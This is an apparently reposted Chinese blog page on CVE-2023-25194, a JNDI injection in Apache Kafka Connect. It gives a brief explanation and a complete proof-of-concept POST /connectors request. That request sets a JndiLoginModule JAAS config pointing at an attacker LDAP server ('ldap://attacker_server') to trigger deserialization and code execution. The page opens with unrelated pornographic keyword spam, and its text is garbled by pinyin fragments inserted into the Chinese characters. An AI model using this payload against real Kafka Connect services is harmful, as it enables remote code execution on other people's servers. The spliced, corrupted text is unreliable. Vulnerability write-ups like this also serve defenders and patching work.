国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

CVE-2023-25194漏洞 Apache Kafka Connect JNDI注入漏洞

這篇具有很好參考價(jià)值的文章主要介紹了CVE-2023-25194漏洞 Apache Kafka Connect JNDI注入漏洞。希望對(duì)大家有所幫助。如果存在錯(cuò)誤或未考慮完全的地方,請(qǐng)大家不吝賜教,您也可以點(diǎn)擊"舉報(bào)違法"按鈕提交疑問(wèn)。

Apache Kafka 的最新更新解決的一個(gè)漏洞是一個(gè)不安全的 Java 反序列化問(wèn)題,可以利用該漏洞通過(guò)身份驗(yàn)證遠(yuǎn)程執(zhí)行代碼。

Apache Kafka 是一個(gè)開源分布式事件流平臺(tái),被數(shù)千家公司用于高性能數(shù)據(jù)管道、流分析、數(shù)據(jù)集成和任務(wù)關(guān)鍵型應(yīng)用程序。超過(guò) 80% 的財(cái)富 100 強(qiáng)公司信任并使用 Kafka。

通過(guò) Aiven API 或 Kafka Connect REST API 配置連接器時(shí),攻擊者可以為連接器設(shè)置database.history.producer.sasl.jaas.config連接器屬性io.debezium.connector.mysql.MySqlConnector。其他 debezium 連接器也可能如此。通過(guò)將連接器值設(shè)置為"com.sun.security.auth.module.JndiLoginModule required user.provider.url="ldap://attacker_server" useFirstPass="true" serviceName="x" debug="true" group.provider.url="xxx";",服務(wù)器將連接到攻擊者的 LDAP 服務(wù)器并反序列化 LDAP 響應(yīng),攻擊者可以使用它在 kafka 連接服務(wù)器上執(zhí)行 java 反序列化小工具鏈。

CVE-2023-25194漏洞 Apache Kafka Connect JNDI注入漏洞,kafka

?鏈接HackerOne

?POCGitHub - ohnonoyesyes/CVE-2023-25194

POST /connectors HTTP/1.1
Host: xxxx:8083
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/json
Connection: close
Content-Length: 1109

{"name": "test", 
   "config":
    {
        "connector.class":"io.debezium.connector.mysql.MySqlConnector",
    	"database.hostname": "xxxxx",
    	"database.port": "3306",
    	"database.user": "root",
    	"database.password": "xxxxxx",
    	"database.dbname": "xxxx",
    	"database.sslmode": "SSL_MODE",
        "database.server.id": "1234",
    	"database.server.name": "localhost",
        "table.include.list": "MYSQL_TABLES",
    	"tasks.max":"1",
        "topic.prefix": "aaa22",
        "debezium.source.database.history": "io.debezium.relational.history.MemoryDatabaseHistory",
        "schema.history.internal.kafka.topic": "aaa22",
        "schema.history.internal.kafka.bootstrap.servers": "kafka:9202",
    	"database.history.producer.security.protocol": "SASL_SSL",
    	"database.history.producer.sasl.mechanism": "PLAIN",
    	"database.history.producer.sasl.jaas.config": "com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://aaa\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
    }
}

?文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-519353.html

?

到了這里,關(guān)于CVE-2023-25194漏洞 Apache Kafka Connect JNDI注入漏洞的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來(lái)自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場(chǎng)。本站僅提供信息存儲(chǔ)空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請(qǐng)注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請(qǐng)點(diǎn)擊違法舉報(bào)進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 【中危】Spring Kafka 反序列化漏洞 (CVE-2023-34040)

    【中?!縎pring Kafka 反序列化漏洞 (CVE-2023-34040)

    zhi.oscs1024.com????? 漏洞類型 反序列化 發(fā)現(xiàn)時(shí)間 2023-08-24 漏洞等級(jí) 中危 MPS編號(hào) MPS-fed8-ocuv CVE編號(hào) CVE-2023-34040 漏洞影響廣度 小 OSCS 描述 Spring Kafka?是 Spring Framework 生態(tài)系統(tǒng)中的一個(gè)模塊,用于簡(jiǎn)化在 Spring 應(yīng)用程序中集成 Apache Kafka 的過(guò)程,記錄(record)指 Kafka 消息中的一

    2024年02月11日
    瀏覽(54)
  • Spring boot使用Kafka Java反序列化漏洞 CVE-2023-34040

    Spring boot使用Kafka Java反序列化漏洞 CVE-2023-34040

    背景:公司項(xiàng)目掃描到 Spring-Kafka上使用通配符模式匹配進(jìn)行的安全繞過(guò)漏洞 CVE-2023-20873 中等風(fēng)險(xiǎn) | 2023年8月23日 | CVE-2023-34040 在Spring for Apache Kafka 3.0.9及更早版本以及2.9.10及更早版本中,存在可能的反序列化攻擊向量,但只有在應(yīng)用了不常見的配置時(shí)才會(huì)出現(xiàn)。攻擊者必須在

    2024年02月07日
    瀏覽(45)
  • Apache Druid中Kafka配置遠(yuǎn)程代碼執(zhí)行漏洞(MPS-2023-6623)

    Apache Druid中Kafka配置遠(yuǎn)程代碼執(zhí)行漏洞(MPS-2023-6623)

    Apache Druid 是一個(gè)高性能的數(shù)據(jù)分析引擎。 Kafka Connect模塊曾出現(xiàn)JNDI注入漏洞(CVE-2023-25194),近期安全研究人員發(fā)現(xiàn)Apache Druid由于支持從 Kafka 加載數(shù)據(jù)的實(shí)現(xiàn)滿足其利用條件,攻擊者可通過(guò)修改 Kafka 連接配置屬性進(jìn)行 JNDI 注入攻擊,進(jìn)而在服務(wù)端執(zhí)行任意惡意代碼。 Apache Dru

    2024年02月07日
    瀏覽(26)
  • CVE-2020-9483 apache skywalking SQL注入漏洞

    CVE-2020-9483 apache skywalking SQL注入漏洞

    漏洞概述 當(dāng)使用H2 / MySQL / TiDB作為Apache SkyWalking存儲(chǔ)時(shí),通過(guò)GraphQL協(xié)議查詢?cè)獢?shù)據(jù)時(shí),存在SQL注入漏洞,該漏洞允許訪問(wèn)未指定的數(shù)據(jù)。 Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存儲(chǔ)實(shí)現(xiàn)不使用適當(dāng)?shù)姆椒▉?lái)設(shè)置SQL參數(shù)。 環(huán)境搭建 拉取vulhub 搭建鏡像 訪問(wèn)8080端口 漏洞復(fù)現(xiàn)

    2024年02月07日
    瀏覽(27)
  • 漏洞復(fù)現(xiàn):Apache Spark 命令注入(CVE-2022-33891)

    漏洞復(fù)現(xiàn):Apache Spark 命令注入(CVE-2022-33891)

    ? Apache Spark 是專為大規(guī)模數(shù)據(jù)處理而設(shè)計(jì)的快速通用的計(jì)算引擎。Spark是UC Berkeley AMP lab (加州大學(xué)伯克利分校的AMP實(shí)驗(yàn)室)所開源的類Hadoop MapReduce的通用并行框架,Spark,擁有Hadoop MapReduce所具有的優(yōu)點(diǎn);但不同于MapReduce的是——Job中間輸出結(jié)果可以保存在內(nèi)存中,從而不再需

    2024年02月09日
    瀏覽(17)
  • CVE-2020-11978 Apache Airflow 命令注入漏洞分析與利用

    CVE-2020-11978 Apache Airflow 命令注入漏洞分析與利用

    漏洞軟件:Apache Airflow 影響版本:= 1.10.10 Vulhub 漏洞測(cè)試靶場(chǎng) 進(jìn)入 /root/vulhub/airflow/CVE-2020-11978/ 目錄 運(yùn)行以下命令啟動(dòng)環(huán)境 在客戶端訪問(wèn) server-ip:8080 找到 example_trigger_target_dag 開啟 (有向無(wú)環(huán)圖) 后變?yōu)?“On” 狀態(tài) 在這一列的右側(cè)點(diǎn)擊如下按鈕 輸入以下字符后點(diǎn)擊 Trigger 按鈕

    2024年02月07日
    瀏覽(43)
  • Apache Kafka - 構(gòu)建數(shù)據(jù)管道 Kafka Connect

    Apache Kafka - 構(gòu)建數(shù)據(jù)管道 Kafka Connect

    Kafka Connect 是一個(gè)工具,它可以幫助我們將數(shù)據(jù)從一個(gè)地方傳輸?shù)搅硪粋€(gè)地方。比如說(shuō),你有一個(gè)網(wǎng)站,你想要將用戶的數(shù)據(jù)傳輸?shù)搅硪粋€(gè)地方進(jìn)行分析,那么你可以使用 Kafka Connect 來(lái)完成這個(gè)任務(wù)。 Kafka Connect 的使用非常簡(jiǎn)單。它有兩個(gè)主要的概念 :source 和 sink 。Source 是

    2024年02月15日
    瀏覽(29)
  • 通達(dá)OA SQL注入漏洞【CVE-2023-4166】

    通達(dá)OA SQL注入漏洞【CVE-2023-4166】

    免責(zé)聲明:請(qǐng)勿利用文章內(nèi)的相關(guān)技術(shù)從事非法測(cè)試,由于傳播、利用此文所提供的信息或者工具而造成的任何直接或者間接的后果及損失,均由使用者本人負(fù)責(zé),所產(chǎn)生的一切不良后果與文章作者無(wú)關(guān)。該文章僅供學(xué)習(xí)用途使用。 通達(dá)OA系統(tǒng),即Offic Anywhere,又稱為網(wǎng)絡(luò)智

    2024年02月13日
    瀏覽(21)
  • Splunk Connect for Kafka – Connecting Apache Kafka with Splunk

    1: 背景: 1: splunk 有時(shí)要去拉取kafka 上的數(shù)據(jù): 下面要用的有用的插件:Splunk Connect for Kafka 先說(shuō)一下這個(gè)Splunk connect for kafka 是什么: Spunk Connect for Kafka is a “sink connector” built on the Kafka Connect framework for exporting data from Kafka topics into Splunk. With a focus on speed and reliability, include

    2024年02月05日
    瀏覽(17)
  • MybatisPlus存在 sql 注入漏洞(CVE-2023-25330)解決辦法

    MybatisPlus存在 sql 注入漏洞(CVE-2023-25330)解決辦法

    MyBatis-Plus TenantPlugin 是 MyBatis-Plus 的一個(gè)為多租戶場(chǎng)景而設(shè)計(jì)的插件,可以在 SQL 中自動(dòng)添加租戶 ID 來(lái)實(shí)現(xiàn)數(shù)據(jù)隔離功能。 MyBatis-Plus TenantPlugin 3.5.3.1及之前版本由于 TenantHandler#getTenantId 方法在構(gòu)造 SQL 表達(dá)式時(shí)默認(rèn)情況下未對(duì) tenant(租戶)的 ID 值進(jìn)行過(guò)濾,當(dāng)程序啟用了 Te

    2024年02月07日
    瀏覽(20)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請(qǐng)作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包